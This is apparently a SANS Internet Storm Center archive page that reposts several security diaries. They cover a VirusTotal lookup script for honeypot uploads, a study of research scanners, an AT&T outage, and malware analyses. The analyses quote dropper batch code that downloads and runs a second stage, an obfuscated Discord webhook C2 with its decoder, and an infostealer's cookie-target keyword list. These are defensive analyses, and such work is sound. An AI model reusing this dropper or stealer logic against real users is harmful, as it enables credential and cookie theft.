Tag Archives: SANS

Utilizing the VirusTotal API to Query Files Uploaded to DShield Honeypot [Guest Diary], (Sun, Feb 25th)

This post was originally published on this site

[This is a Guest Diary by Keegan Hamlin, an ISC intern as part of the SANS.edu BACS program]

Part of the SANS undergraduate program is a 20-week internship with the SANS Internet Storm Center. During that time, interns are tasked with setting up a DShield sensor to act as a honeypot, capturing data and generating logs for SSH/Telnet, firewall activity, web requests, and, most interesting to me, file uploads. With those logs, we are expected to create attack observations, explaining what vulnerability is being exploited, what the attacker is attempting to accomplish, and how to defend against the attack. I wanted to give myself a project to help with creating these attack observations, and in my case, that meant a way to quickly get information on the uploaded files. At the beginning of the internship, I had given myself a personal goal: to do something to build my Python skills. I thought this might be the opportunity to do that.

VirusTotal is a go-to source to upload or search for hashes of suspicious files and it is what I typically use when investigating files uploaded to the honeypot. They offer an API to automate this process, and it integrates well with Python.

Simple Command Line Query

I began by following the steps listed in the VirusTotal quick start page for their Python integration tool vt-py. [1]

You can install this package in several ways, but I simply used pip:
$ pip install vt-py

After playing around with the tool in a Python interactive session, I wrote a simple script that takes a file hash as a command line argument:

import vt
import sys

try:
    file_hash = sys.argv[1]
except IndexError:
    print("ERROR: You must supply a file hash.")
    sys.exit(1)

# //// VIRUSTOTAL API KEY ////
API = "YOUR_API_KEY_HERE"  # change this to your VirusTotal API key

client = vt.Client(API)

file = client.get_object(f"/files/{file_hash}")

analysis = file.last_analysis_stats

for x,y in analysis.items():
    print(x.title(),":",y)

client.close()

The output looks like this:

$ python vt_simple.py 57e9955208af9bc1035bd7cd2f7da1db19ea73857bea664375855f693a6280d8
Malicious : 37
Suspicious : 0
Undetected : 22
Harmless : 0
Timeout : 0
Confirmed-Timeout : 0
Failure : 1
Type-Unsupported : 15

This doesn't give a whole lot of information; however, while investigating an attack, it is a quick way to check whether a file has already been analyzed and is being tracked as malicious.

I wanted more though. I wanted a way to automate submissions of all the files within the Cowrie /downloads directory and output in a format that would make it easy to quickly scan to determine which files might need further analysis.

Full Scan of Cowrie Downloads Directory

There were a couple of things I needed to keep in mind before writing this script. For one, the VirusTotal API has limitations on the frequency and number of queries for a free-tier account: 4 lookups/min, 500/day, and 15.5 K/month. There is no way that I would hit the daily or monthly limits, but I had to make sure the script didn't perform more than 4 queries a minute. Easy enough to manage by adding a pause between each lookup. However, depending on the number of files in the downloads directory, this does mean that the script will take some time to complete the first time it is run.

Another aspect that I wanted to keep in mind was that I did not want the script to query files that it had already retrieved data on. There might be some spaghetti coding going on here, but to prevent that from happening, I had the script maintain a separate file_hashes.txt file that holds all the hashes that have already been used to query VirusTotal.
In the Cowrie download directory, all the filenames should already be the SHA256 hash of the file. In my case, there were a few that were not. I had already added a try/except block in my function that queries VirusTotal so that if a query fails, it won't send an error to the console and end the program. To cover my bases and ensure that an actual file hash gets submitted, I added an if/else block to check whether the filename is exactly 64 characters long, the length of a SHA256 hash in hex. This might not be the best way, but it keeps the program from needlessly hashing each file, especially considering most of them are already named with the appropriate file hash.
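Here is a minimal sketch of the dedup and rate-limiting logic described above; the directory path, placeholder API key, and file names are illustrative, not the exact script:

import os
import time
import vt

DOWNLOADS = "/srv/cowrie/downloads"   # Cowrie downloads directory
SEEN_FILE = "file_hashes.txt"         # hashes already submitted to VirusTotal

seen = set()
if os.path.exists(SEEN_FILE):
    with open(SEEN_FILE) as f:
        seen = {line.strip() for line in f}

with vt.Client("YOUR_API_KEY_HERE") as client:
    for name in os.listdir(DOWNLOADS):
        # Cowrie names files by their SHA256 hash: 64 hex characters
        if len(name) != 64 or name in seen:
            continue
        try:
            obj = client.get_object(f"/files/{name}")
            print(name, obj.last_analysis_stats)
        except vt.APIError as e:
            print(name, "lookup failed:", e)
        with open(SEEN_FILE, "a") as f:
            f.write(name + "\n")
        time.sleep(15)  # stay under the free tier's 4 lookups/minute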

This led me down a path to figure out how to hash a file in Python. In the Linux terminal, it's as easy as running the sha256sum command to get the hash. I already knew of the Python hashlib module but was unsure of how to use it to hash a file. After some Google searching, I came across a page that was exactly what I was looking for [2]. Here is the code:

# Python program to find SHA256 hash string of a file
import hashlib
 
filename = input("Enter the input file name: ")
sha256_hash = hashlib.sha256()
with open(filename,"rb") as f:
    # Read and update hash string value in blocks of 4K
    for byte_block in iter(lambda: f.read(4096),b""):
        sha256_hash.update(byte_block)
    print(sha256_hash.hexdigest())

Just for the sake of learning more, I asked ChatGPT how I would go about hashing a file in Python and it gave me an almost verbatim answer. I’m thinking either ChatGPT sourced its response from the page I found, or vice-versa. Either way, I got what I was looking for and learned a little bit about the process of hashing a file.

The output of this program is a simple database in the form of a CSV file. Viewing it in the terminal is horrendous. Obviously, transferring it out to a host machine is an option, either by scp or even nc, but I found it easy enough to copy/paste the contents into a blank notepad, save it as a '.csv' file, and open it in Excel (or the CSV viewer of your choice). The results look like this:

For times that I would like to stay in the terminal and take a quick glance at the database, I added a function to the program that outputs a second plain text document formatted in a legible way. There's no sorting capability, and it may not be the best looking, but it is a nice way to quickly pull up and review the data while investigating attacks without having to leave the terminal. There were a couple of different ways to get a CSV to pretty print in the terminal, like the PrettyTable library, but I liked the way this looked. It isn't my code, however; I found it in a Stack Overflow post [3]. It looks like this:
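The underlying technique is simple: pad each column to the width of its longest value. A minimal sketch of that idea (not the exact Stack Overflow code; the file name is illustrative, and a non-empty, rectangular CSV is assumed):

import csv

with open("vt_results.csv", newline="") as f:
    rows = list(csv.reader(f))

# Compute the widest entry in each column, then pad every cell to match
widths = [max(len(row[i]) for row in rows) for i in range(len(rows[0]))]
for row in rows:
    print("  ".join(cell.ljust(w) for cell, w in zip(row, widths)))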

Both scripts can be found on my Github:
https://github.com/ham-sauce/vt_cowrie

By the time I implemented this script on my DShield sensor, it had already been running for several months, so I had quite a few files that needed to be processed, roughly 160. At 4 queries a minute, it took about 40 minutes for the initial run. Once the initial database is made, running the script again will not take nearly as long. The way I have been using it is to run it periodically every few days. If it takes longer than an instant to complete, then I know something new has been added to the downloads directory (there is also an alert printed to the console stating which hash is being queried).

I really only scratched the surface of what can be done with the VirusTotal API. There is definitely room to refine this script, make it more robust, and tweak it to gather more data.

Next Steps: Simple Malware Analysis

Using the above output from the script, I want to try to find something interesting to investigate. I sort the list of files by ‘UNDETECTED’, as I feel that if a file is being reported as malicious, there are already plenty of analysis reports that I can look up.

In my case, many of these undetected files were not worth much further investigation, as many of them were simple ASCII text files containing one or two bash commands. But it's a good starting point.

Static Analysis

I only do a couple of things in regard to static analysis, and I will accomplish this in the DShield terminal. 
First, I will run the file command on the file of interest, getting something like this:
ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, missing section headers

And then I will run the strings command, which rarely returns anything useful, but sometimes there will be a string or two worthwhile, like the following:
$Info: This file is packed with the UPX executable packer http://upx.sf.net $

At this point, I will move the file to an analysis virtual machine, either FlareVM or REMNUX. To do this somewhat safely, I like to zip it and password protect it like so:
zip --password infected mal.zip </path/to/file>

And then scp it to my host of choice.

Dynamic/Behavioral Analysis

When I first started this post, I really wanted to get my hands on Mockingbird from Assured Information Security. [4] It is an automated malware analysis environment based on the Cuckoo Sandbox. I had used it at my previous job, and it is extremely easy to use. It comes pre-configured; all you have to do is load it up in either ESXi or VMware Workstation. According to the data sheet, they have an evaluation copy available, but unfortunately the company never got back to me.

The official Cuckoo Sandbox is no longer supported. However, there are several forks available such as cuckoo3 [5] and CAPEv2 [6]. Setting either of those up is a bit of an undertaking, not for the faint of heart. I ran into issues that I couldn’t resolve in a timely manner, and it all seemed a bit out of scope for what I was trying to accomplish, so I abandoned this idea.

There are numerous web-based automated malware analyzers out there. Unfortunately, most of them only support Windows executables, at least in the free tier. And with the DShield honeypot being Linux based, pretty much any malware uploaded to it is going to be an ELF executable or bash script. Surprisingly, as I was writing this, ANY.RUN [7] released a Linux environment to analyze malware.

It is very simple to use. After creating an account and signing in, click the new task button:

Drag and drop your file into the window and select Ubuntu:

The app will then run the executable in an Ubuntu virtual environment and generate a report for review. There are numerous indicators that can be further investigated, such as process information which includes command line arguments, file activity, and network activity like connections made or DNS requests. At that point, you could correlate some of this data with other attacks made against the honeypot and possibly find even more rabbit holes to go down.

Final Thoughts

This is obviously not a full deep dive into malware analysis. My goal was to create a simple process for myself to assist with researching the events taking place on my DShield honeypot. There is plenty of room for this to grow, and there is so much information out there on doing proper malware analysis.

[1] https://virustotal.github.io/vt-py/quickstart.html
[2] https://www.quickprogrammingtips.com/python/how-to-calculate-sha256-hash-of-a-file-in-python.html
[3] https://stackoverflow.com/questions/52520711/how-to-output-csv-data-to-terminal-with-python
[4] https://www.ainfosec.com/rd/mockingbird/
[5] https://github.com/cert-ee/cuckoo3
[6] https://github.com/kevoreilly/CAPEv2
[7] https://app.any.run/
[8] https://www.sans.edu/cyber-security-programs/bachelors-degree/

———–
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Update: MGLNDD_* Scans, (Sat, Feb 24th)

This post was originally published on this site

Almost 2 years ago, a reader asked us about TCP connections they observed. The data of these TCP connections starts with "MGLNDD_": "MGLNDD_* Scans".

Reader Michal Soltysik reached out to us with an answer: MGLN is Magellan, RIPE Atlas Tools. RIPE Atlas employs a global network of probes that measure Internet connectivity and reachability.

Thanks to Michal for explaining this in a video.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Simple Anti-Sandbox Technique: Where's The Mouse?, (Fri, Feb 23rd)

This post was originally published on this site

Malware samples have plenty of techniques to detect if they are running in a "safe" environment. By safe, I mean a normal computer with a user between the keyboard and the chair, programs running, etc. These techniques are based on checking the presence of specific processes, registry keys, or files. The hardware can also be a good indicator (are some devices present or not?)

Some techniques rely on basic checks that can be easily implemented in a simple Windows script (.bat) file. I found an interesting one that performs a basic check before downloading the next payload. The file has the following SHA256 hash: 460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb[1]

set "mouseConnected=false"

for /f "tokens=2 delims==" %%I in ('wmic path Win32_PointingDevice get PNPDeviceID /value ^| find "PNPDeviceID"') do (
    set "mouseConnected=true"
)

if not !mouseConnected! == true (
    exit /b 1
)

The script uses the WMI ("Windows Management Instrumentation") client to query the hardware and filter interesting devices. Here is an output generated on a regular computer:

C:\Users\REM\Desktop>wmic path Win32_PointingDevice get PNPDeviceID /value

PNPDeviceID=ACPI\PNP0F13\4&1BD7F811&0

PNPDeviceID=USB\VID_0E0F&PID_0003&MI_01\7&12E62A01&0&0001

PNPDeviceID=USB\VID_0E0F&PID_0003&MI_00\7&12E62A01&0&0000

Indeed some basic sandboxes do not have a mouse connected to them. Easy trick! Note that, in a lot of organizations, access to the "wmic" tool is prohibited for normal users because it can be used to perform a lot of sensitive actions.
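For comparison, the same check can be expressed in a few lines of Python with the wmi module; this is a sketch for illustration, not code taken from the sample:

import sys
import wmi

c = wmi.WMI()
devices = c.Win32_PointingDevice()

# No pointing device enumerated: likely a bare sandbox, so bail out
if not devices:
    sys.exit(1)

for dev in devices:
    print(dev.PNPDeviceID)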

If no mouse is detected, the script will fetch its copy of a minimal Python environment and install it:

set "eee=https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe"
set "eeee=python-installer.exe"
curl -L -o !eeee! !eee! --insecure --silent
start /wait !eeee! /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0 > NUL 2>&1
del !eeee!

Finally, it will download and execute the second stage:

set "ENCODED_URL=hxxps://rentry[.]co/zph33gvz/raw
set "OUTPUT_FILE=webpage.py"
curl -o %OUTPUT_FILE% -s %ENCODED_URL% --insecure
if %ERRORLEVEL% neq 0 (
    echo Error: Failed to download the webpage.
    exit /b 1
)
python -m %OUTPUT_FILE%
del %OUTPUT_FILE%

The second stage is another InfoStealer. Nothing special except the way the Discord channel used as C2 is obfuscated:

webhook = b'\xc8~~\xc9(T>>\x10\x1e(\x82=\xa1\x10\x95\x82=$>\xbc\xc9\x1e>lM1\xc8=={(>\xb08-Z-\xb3-\x8b8\x8b\x1b\xb0\xb3\xb0\xb08\x87Z\x8b>\xf91\xe0f&\x82g\xe0\xa7g\x98\xf0Y\xd60\xcdX\xb4\xb4\xfe\xa6\xc9\xc9l~Y(g\xf8\x1c&\x82\xd6Nf\x87e\xe0\xf7)\xf70e_,8\xfe\xa6Z\x1c\xe28M\xaf_\xc6,1E\xf7N_\xf2,_\x1bne',b'x.\x8dV+\xb1c\x94\x9cw\xb5\x8ct]\x12r\x91[5y\x8a\x15L\xe5Bq\xd0\xa5\x0c\xd9\xe8\x9f\xdd\x93J\xd4\x88\xb8\x84\xa3K\x02\x0f\xa8E\x95>-\xb08\x87\x8b\x1b\xb3\xf2\x18ZTG\x16\xb2i\xcf\x11\xb4\xf7\x07\x1cuOY\xcd\xe0_,m&\xf0\xaaX\xfeW\xaf\x90\xf9\xc6\xae\xf8\x08n\x7f\xab\x014e\x9a\xbc1\x82\x10M)f\xc8\x1e\xd6{g$\xe2=\xc9\x98\xa1(~N\xc5l\xa6\xa70\xba/\x053\xb6b\xfd"\xde\xa4h\x9bId\xc1\xc4\xb9\x96\xf3\x83\x06\xbd2H\xc7\xc0\xd5z\xa0\x99ao\xef\x13r\x1dP7\x14v\xa2\xeek\xeb\xe1\xbf9}:R\xe7\'\xbb<DQ\x9e^\xfc\xad%\x8e\x1f\x97\xc2U\x19\x86\x17\x81\xff\xea\xfa\x9dF\xa9p!\xcc#\xc3C\x85\xdc|\xf5j;\xbeA\xec\xe4\x80\xd2\xf4S\xb7\xdb\xe9\x89\xcb\xd76\x0b\xe3`@\x92\x03\xf1s\xfbn\xf6\xd1\xda\xd3\x0e\xd8t\x00\x8f\xed\xe6\xac \xdf\x04\xca?*\x1a\xce'

It is decrypted using this simple function:

def DeobfuscateWeb(encrypted_text, key):
    decrypted = [0] * 256
    for i, char in enumerate(key):
        decrypted[char] = i

    decrypted_text = []
    for char in encrypted_text:
        decrypted_char = decrypted[char]
        decrypted_text.append(decrypted_char)

    return bytes(decrypted_text)

and returns "hxxps://discord[.]com/api/webhooks/1209060424516112394/UbIgMclIylqNGjzHPAAQxppwtGslXDMcjug3_IBfBz_JK2Qx9Dn2eSJVKb-BuJ7KJ5Z_"

[1] https://www.virustotal.com/gui/file/460f956ecb4b54518be32f2e48930187356301013448e36414c2fb0a1815a2cb/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Large AT&T Wireless Network Outage #att #outage, (Thu, Feb 22nd)

This post was originally published on this site

Beginning this morning, AT&T's cellular network suffered a major outage across the US. At this point, AT&T has not made any statement as to the nature of the outage. It is far too early to speculate. In the past, similar outages were often caused by misconfigurations or technology failures.

What makes the outage specifically significant is that phones cannot connect to cell towers in some areas. This means you cannot make any calls, send or receive SMS messages, or reach emergency services. Some iPhones display the "SOS" indicator, which is displayed if the phone is able to make emergency-only calls via another provider's network. For some newer iPhones, satellite services may be used.

As a workaround, WiFi calling is still reported to work. If you do have an internet connection via a different provider and are able to enable WiFi calling, you will be able to make and receive calls.

Note that this will affect many devices like location trackers, alarm systems, or other IoT devices that happen to use AT&T's network. This could have security implications if you rely on these devices to monitor remote sites.

Some users are reporting that service has already been restored in their area, but without an official statement from AT&T, it is hard to predict how long service restoration will take. For your own planning purposes, I would assume it will be several hours for the service to be fully restored.

Some other workarounds to consider:

  • Many modern phones will allow for a second eSIM to be installed. Other carriers, such as T-Mobile, sometimes offer free trials of their networks, and it may get you going for the day.
  • As mentioned above, WiFi calling is reported to work.
  • Get a data-only eSIM with a low-cost provider with enough data to "survive" the day.

For resiliency, it is always best to have a secondary internet connection available. In many cases, the cellular connection is your secondary connection. The outage also affects AT&T resellers (MVNOs) like Cricket, Consumer Cellular, and Straight Talk.


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[Guest Diary] Friend, foe or something in between? The grey area of 'security research', (Thu, Feb 22nd)

This post was originally published on this site

[This is a Guest Diary by Rachel Downs, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

Scanning on port 502

I’ve been running my DShield honeypot for around 3 months, and recently opened TCP port 502. I was looking for activity on this port as it could reveal attacks targeted towards industrial control systems which use port 502 for Modbus TCP, a client/server communications protocol. As with many of my other observations, what started out as an idea to research one thing soon turned into something else, and ended up as a deep dive into security research groups and the discovery of a lack of transparency about their actions and intent.

I analysed 31 days of firewall logs between 2023-12-05 and 2024-01-04. Over this period, there were 197 instances of scanning activity on port 502 from 179 unique IP addresses.

 

Almost 90% of scanning came from security research groups

Through AbuseIPDB [2] and GreyNoise [3], I assigned location, ISP and hostname data (where available) to each IP address. GreyNoise assigns actors to IP addresses and categorises these as benign, unknown or malicious. Actors are classified as benign when they are a legitimate company, search engine, security research organisation, university or individual, and GreyNoise has determined the actor is not malicious in nature. Actors are classified as malicious if harmful behaviours have been directly observed by GreyNoise, and if an actor is not classified as benign or malicious it is marked as unknown [4]. 

I used this classification, additional data from AbuseIPDB, and the websites of self-declared security research groups to categorise the scanning activity observed in my honeypot firewall logs.

 

89% of the total scanning activity was attributed to security research groups, 3% was attributed to known malicious actors and 8% was unknown.

Who are these researchers, and why are they scanning?

Almost half of the activity classified as security research came from two groups: Stretchoid and Censys. Other frequently observed groups included Palo Alto Networks, Shadowserver Foundation, InterneTTL, Cyble and the Academy for Internet Research. The remaining groups were only observed scanning port 502 once or twice each, including Shodan.

 

The motivations of these different research groups vary, and for some, their purpose is unclear or unstated. Some are academic research projects, some are commercial organisations collecting data to feed into their products and services, and others are less clear.

Stretchoid was the most active actor identified, accounting for 25% of security research activity. There is very little information available about them, aside from an opt-out page. The page states “Stretchoid is a platform that helps identify an organisation’s online services. Sometimes this activity is incorrectly identified by security systems, such as firewalls, as malicious. Our activity is completely harmless” [5]. However, there is a lack of transparency around the organisation responsible for Stretchoid and as such, online discussions about them urge caution around submitting data through the opt-out form [6].

Censys conducts internet-wide scanning to collect data for its security products and datasets [7].

Palo Alto Networks could be identified using the ISP name; however, they do not enable reverse DNS lookup for hostnames to identify the scanner being used. These IP addresses are marked as benign in GreyNoise and attributed to Palo Alto's Cortex Xpanse product.

Shadowserver Foundation describe themselves as “a nonprofit security organisation working altruistically behind the scenes to make the internet more secure for everyone” [8].

InterneTTL's website was not active at the time of this report; however, GreyNoise points to it being a security research organisation that regularly mass-scans the internet [9].

Cyble describes its ODIN product as “one of the most powerful search engines for internet scanned assets”. It carries out host searches, asset discovery, port scanning, service identification, vulnerability detection and certificate analysis [10].

The Academy for Internet Research’s website states they are “a group of security researchers that wish to make the internet free, safe and accessible to all” [11].

bufferover.run is identified by GreyNoise as a commercial organisation that performs domain name lookups for TLS certificates in IPv4 space. GreyNoise has marked this actor as benign but it is unclear why they are carrying out port scanning activity [12].

Crowdstrike was seen twice via scans from Crowdstrike Falcon Surface (Reposify), which they describe as “the world’s leading AI-native platform for unified attack surface management” [13].

SecurityTrails is a Recorded Future company offering APIs and data services for security teams [14].

Shodan scanners were seen twice. These are used to capture data for Shodan’s search engine for internet-connected devices [15].

Alpha Strike Labs is a German security research company producing open source intelligence about attack surfaces using global internet scans. They claim to maintain more than 2000 IPv4 addresses for scanning [16].

BinaryEdge "scan the entire public internet, create real-time threat intelligence streams and reports that show the exposure of what is connected to the internet" [17].

CriminalIP is an internet-exposed device search engine run by AI Spera [18].

Internet Census Group is led by BitSight Technologies Inc and states data is collected to “analyse trends and benchmark security performance across a broad range of industries” [19].

Internet Measurement is operated by driftnet.io and is used to “discover and measure services that network owners and operators have publicly exposed”. They offer free access to an external view of your network from the data they have gathered [20].

Onyphe describes itself as a “cyber defence search engine” [21]. They provide an FAQ about their scanning on their website.

The Technical University of Denmark’s research project aims to identify “digital ghost ships” [22], devices which appear to be abandoned and un-maintained.

A lack of transparency

The UK's National Cyber Security Centre (NCSC), when launching its own internet scanning capability, provided some transparency and scanning principles [23] that they committed to following, and encouraged other security researchers to do the same:

  • Publicly explain the purpose and scope of the scanning system
  • Mark activity so that it can be traced back to the scanning system being used
  • Audit scanning activity so abuse reports can be easily and confidently assessed
  • Minimise scanning activity to reduce impact on target resources
  • Ensure opt-out requests are simple to send and processed quickly

Adherence to these principles varied between the research groups observed, but was generally quite poor among the more prolific scanners in this observation. It was not possible to observe whether research groups were auditing scanning activity, so this is not rated in the table below.

Fig 4: An analysis of security research groups’ adherence to NCSC’s ethical scanning principles
 

Fig 5: A guide to the ratings used in Fig 4

 

This lack of transparency makes it difficult to determine whether this activity is truly benign.

Good practice is demonstrated by Onyphe, who provide information about their scanning and their “10 commandments for ethical internet scanning” on their website. Along with the Technical University of Denmark, they also provide a web server on each of their probes which explains the purpose, intent and the ability to opt out.  

Why does this matter?

The volume of scanning activity related to security research is significant, and has an impact on honeypot data. This has been discussed in a previous ISC blog post by Johannes Ullrich, “The Impact of Researchers on Our Data” [24]. Quick and accurate identification and filtering of research activity enables honeypot operators to more rapidly identify malicious activity, or activity that requires further investigation.

Equally, the presence of honeypot data in security research scans impacts the conclusions that will be drawn by researchers about the presence of open ports and vulnerable systems, and the estimated scale of these issues.

Although researchers themselves may not be using the data collected for malicious purposes, they may lose control of how the data is used once it is shared or sold elsewhere. For example, Shodan scanning activity is classed as security research, however the resulting data can be used by attackers to find vulnerable targets. 

Some of the organisations involved in this scanning are profiting from the data collected from your systems, utilising your resources to do so. Ethical researchers should allow you to opt out of this data collection.

Security research is a broad term, and the intent behind scanning activity is not always clear. This makes security research something of a grey area, and means transparency is key in order for informed decisions to be made.

What should I do?

As a honeypot operator, or someone responsible for monitoring internet-facing systems, you may decide to reduce scanning noise by blocking security research traffic. This is made difficult when researchers don't publish the IP addresses they use or don't provide the ability to opt out. To help with this, the ISC provides a feed of IP addresses used by researchers through their API [25].
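A minimal sketch of pulling that feed, assuming the documented "?json" switch [25]; the exact response structure may differ, so inspect the live output before relying on specific field names:

import requests

url = "https://isc.sans.edu/api/threatcategory/research?json"
resp = requests.get(url, timeout=30)
resp.raise_for_status()

# The records are assumed to be a list of dicts with an "ipv4" field;
# adjust these keys if the live response is structured differently.
for entry in resp.json():
    if isinstance(entry, dict):
        print(entry.get("ipv4"))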

All activity relating to Stretchoid, the most active research group in this observation, originated from DigitalOcean. Some users recommend blocking DigitalOcean’s IP ranges (unless this is required for your organisation) as an alternative to opting out. 

A number of GitHub projects also exist to track the IP ranges of Stretchoid and other security research groups, such as szepeviktor's stretchoid.ipset [26].

Research groups could do more to build trust and help security teams separate benign activity from malicious. If you carry out internet scanning activities, it’s a good idea to follow the NCSC guidance discussed in this blog post to maintain transparency and allow others to make informed decisions about allowing or blocking your scans. 

Enabling reverse DNS and using hostnames that identify your organisation or scanner is a good way to make your scanning activity identifiable, and an informative web page with a clear explanation of the purpose of data collection, including the ability to opt out, helps demonstrate your positive intentions. 

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://www.abuseipdb.com
[3] https://www.greynoise.io
[4] https://docs.greynoise.io/docs/understanding-greynoise-classifications
[5] https://stretchoid.com/
[6] https://www.reddit.com/r/cybersecurity/comments/10w2eab/stretchoid_phishing_and_recon_campaign/
[7] https://about.censys.io/
[8] https://www.shadowserver.org/
[9] https://viz.greynoise.io/tag/internettl?days=1
[10] https://getodin.com/
[11] https://academyforinternetresearch.org/
[12] https://viz.greynoise.io/tag/bufferover-run?days=1
[13] https://www.crowdstrike.com/products/exposure-management/falcon-surface/
[14] https://securitytrails.com/
[15] https://www.shodan.io/
[16] https://www.alphastrike.io/en/how-it-works/
[17] https://www.binaryedge.io/
[18] https://www.criminalip.io/
[19] https://www.internet-census.org/home.html
[20] https://internet-measurement.com/
[21] https://www.onyphe.io/about
[22] https://www.dtu.dk/english/newsarchive/2023/01/setting-out-to-sink-the-internets-digital-ghost-ships
[23] https://www.ncsc.gov.uk/blog-post/scanning-the-internet-for-fun-and-profit
[24] https://isc.sans.edu/diary/The+Impact+of+Researchers+on+Our+Data/26182
[25] https://isc.sans.edu/api/threatcategory/research (append “?json” or “?tab” to view in JSON or tab delimited format)
[26] https://github.com/szepeviktor/debian-server-tools/blob/master/security/myattackers-ipsets/ipset/stretchoid.ipset


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Phishing pages hosted on archive.org, (Wed, Feb 21st)

This post was originally published on this site

The Internet Archive is a well-known and much-admired institution, devoted to creating a “digital library of Internet sites and other cultural artifacts in digital form”[1]. On its “WayBackMachine” website, which is hosted on https://archive.org/, one can view archived historical web pages from as far back as 1996. The Internet Archive basically functions as a memory for the web, and currently holds over 800 billion web pages as well as millions of books, audio and video recordings and other content… Unfortunately, since it allows for uploading of files by users, it is also used by threat actors to host malicious content from time to time[2,3].

Python InfoStealer With Dynamic Sandbox Detection, (Tue, Feb 20th)

This post was originally published on this site

Infostealers written in Python are not new. They also include a lot of sandbox detection mechanisms to prevent them from being executed (and probably detected) by automated analysis. Last week, I found one that uses the same approach but in a different way. Usually, the scripts have a list of "bad stuff" to check, like MAC addresses, usernames, processes, etc. These are common ways to detect simple sandboxes that are not well-hardened. This time, the "IOD" (Indicators Of Detection) list is stored online on a Pastebin-like site, allowing the indicators to be updated for all scripts already deployed. It's also a way to disclose less interesting information in the script itself.

The file, called main.py, has a VT score of 22/61 (SHA256: e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06)[1]

The script will fetch indicators from many files hosted on rentry.co[2]:

remnux@remnux:/MalwareZoo/20240217$ grep hxxps://rentry[.]co main.py 
     processl = requests.get("hxxps://rentry[.]co/x6g3is75/raw").text
     mac_list = requests.get("hxxps://rentry[.]co/ty8exwnb/raw").text
     vm_name = requests.get("hxxps://rentry[.]co/3wr3rpme/raw").text
     vmusername = requests.get("hxxps://rentry[.]co/bnbaac2d/raw").text
     hwid_vm = requests.get("hxxps://rentry[.]co/fnimmyya/raw").text
     gpulist = requests.get("hxxps://rentry[.]co/povewdm6/raw").text
     ip_list = requests.get("hxxps://rentry[.]co/hikbicky/raw").text
     guid_pc = requests.get("hxxps://rentry[.]co/882rg6dc/raw").text
     bios_guid = requests.get("hxxps://rentry[.]co/hxtfvkvq/raw").text
     baseboard_guid = requests.get("hxxps://rentry[.]co/rkf2g4oo/raw").text
     serial_disk = requests.get("hxxps://rentry[.]co/rct2f8fc/raw").text

All files were published on January 27, 2024, around 23:19 UTC. The website also shows the number of views. Currently, there are only two (certainly my own visits), so the script hasn't been released in the wild yet. I'll keep an eye on these counters in the coming days.

Here is an example of usage:

def checkgpu(self):
    c = wmi.WMI()
    for gpu in c.Win32_DisplayConfiguration():
        GPUm = gpu.Description.strip()
    gpulist = requests.get("https://rentry.co/povewdm6/raw").text
    if GPUm in gpulist:
        sys.exit()

The remaining part of the stealer is very classic. I just extracted the list of targeted websites (cookies are collected and exfiltrated):

keyword = [
    'mail',
    'coinbase',
    'sellix',
    'gmail',
    'steam',
    'discord',
    'riotgames',
    'youtube',
    'instagram',
    'tiktok',
    'twitter',
    'facebook',
    'card',
    'epicgames',
    'spotify',
    'yahoo',
    'roblox',
    'twitch',
    'minecraft',
    'bank',
    'paypal',
    'origin',
    'amazon',
    'ebay',
    'aliexpress',
    'playstation',
    'hbo',
    'xbox',
    'buy',
    'sell',
    'binance',
    'hotmail',
    'outlook',
    'crunchyroll',
    'telegram',
    'pornhub',
    'disney',
    'expressvpn',
    'crypto',
    'uber',
    'netflix'
]

You can see that classic sites are targeted but generic keywords are also present like "crypto", "bank" or "card". Cookies belonging to URLs containing these keywords will also be exfiltrated.
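In other words, the filter is just a substring match against each cookie's originating site. A sketch of the idea, with function and variable names invented for illustration:

def is_interesting(cookie_host, keywords):
    # A cookie is exfiltrated when any keyword appears in its host/URL
    return any(k in cookie_host.lower() for k in keywords)

print(is_interesting("www.mybank.example", ["bank", "crypto", "card"]))  # True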

[1] https://www.virustotal.com/gui/file/e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06/details
[2] https://rentry.co

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Mirai-Mirai On The Wall… [Guest Diary], (Sun, Feb 18th)

This post was originally published on this site

[This is a Guest Diary by Rafael Larios, an ISC intern as part of the SANS.edu BACS program]

About This Blog Post

This article is about one of the ways attackers on the open Internet are attempting to use the Mirai botnet [1][2] malware to exploit vulnerabilities on exposed IoT devices. My name is Rafael Larios, and I am a student in the SANS Technology Institute's Bachelor's in Applied Cyber Security program. One of the requirements for completion of this degree is to participate in an internship with the Internet Storm Center as an apprentice handler. Throughout this article, I will provide some insight on an attack method I found to be interesting.

It’s All About Mirai…

There are many sources discussing Mirai and a vulnerability found in IoT devices that allows attackers to join a host to their botnet. This malware still has relevance and continues to be used in attempts to compromise undefended systems. In 2023, at least three CVEs involving Mirai were reported: CVE-2023-1389 [3], CVE-2023-26801 [4], and CVE-2023-23295 [5]. The malware has continued to evolve since its initial creation in 2016. More on the humble origins of this malware can be found in the citations at the end of this article.

What Happened?

